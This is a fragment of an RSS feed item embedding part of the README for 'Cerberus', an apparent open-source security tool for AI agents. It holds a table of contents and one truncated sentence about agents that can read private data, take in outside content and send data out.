&lt;li&gt;&lt;a href="https://github.com/Odingard/cerberus#-what-is-cerberus" rel="noopener noreferrer"&gt;🎯 What is Cerberus?&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/Odingard/cerberus#-in-action" rel="noopener noreferrer"&gt;🎬 In Action&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/Odingard/cerberus#-what-it-detects" rel="noopener noreferrer"&gt;✨ What It Detects&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/Odingard/cerberus#-editions" rel="noopener noreferrer"&gt;📦 Editions&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/Odingard/cerberus#-quickstart" rel="noopener noreferrer"&gt;🚀 Quickstart&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/Odingard/cerberus#-empirical-results" rel="noopener noreferrer"&gt;📊 Empirical Results&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/Odingard/cerberus#%EF%B8%8F-architecture" rel="noopener noreferrer"&gt;🏗️ Architecture&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/Odingard/cerberus#owasp-alignment" rel="noopener noreferrer"&gt;OWASP Alignment&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/Odingard/cerberus#-framework-integrations" rel="noopener noreferrer"&gt;🔌 Framework Integrations&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/Odingard/cerberus#-performance" rel="noopener noreferrer"&gt;⚡ Performance&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/Odingard/cerberus#%EF%B8%8F-roadmap" rel="noopener noreferrer"&gt;🗺️ Roadmap&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/Odingard/cerberus#%EF%B8%8F-honest-limitations" rel="noopener noreferrer"&gt;⚠️ Honest Limitations&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/Odingard/cerberus#-license" rel="noopener noreferrer"&gt;📜 License&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;




&lt;div class="markdown-heading"&gt;
&lt;h2 class="heading-element"&gt;🎯 What is Cerberus?&lt;/h2&gt;
&lt;/div&gt;

&lt;p&gt;Every AI agent that can &lt;strong&gt;(1) access private data, (2) read external content, and (3) send data outbound&lt;/strong&gt;…&lt;/p&gt;
&lt;/div&gt;


&lt;/div&gt;
&lt;br&gt;
  &lt;div class="gh-btn-container"&gt;&lt;a class="gh-btn" href="https://github.com/Odingard/cerberus" rel="noopener noreferrer"&gt;View on GitHub&lt;/a&gt;&lt;/div&gt;
&lt;br&gt;
&lt;/div&gt;



&lt;p&gt;Full methodology, per-payload results, and execution traces are in&lt;br&gt;
docs/research-results.md in the repo. All numbers are reproducible.&lt;br&gt;
&lt;/p&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

</description>
      <category>security</category>
      <category>ai</category>
      <category>typescript</category>
      <category>opensource</category>
    </item>
  </channel>
</rss>
